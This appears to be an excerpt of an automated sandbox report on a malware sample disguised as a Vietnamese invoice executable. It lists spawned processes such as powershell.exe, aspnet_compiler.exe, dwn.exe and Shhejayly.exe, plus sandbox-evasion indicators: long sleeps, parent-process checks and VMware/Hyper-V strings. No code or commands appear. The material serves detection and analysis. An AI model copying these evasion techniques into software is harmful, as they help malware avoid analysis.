Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe TID: 868	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe TID: 5128	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5160	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5392	Thread sleep count: 44 > 30	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Last function: Thread delayed

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

14_2_0040DD85

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 9489

Jump to behavior

Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: dwn.exe, 00000011.00000002.561697222.0000000004345000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SQEMU\[_EbDU
Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
Source: Shhejayly.exe, 00000012.00000002.567010928.0000000006EEC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: Shhejayly.exe, 00000012.00000002.528271926.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWt
Source: aspnet_compiler.exe, 0000000C.00000002.525361039.000000000137D000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.355610378.0000000001377000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
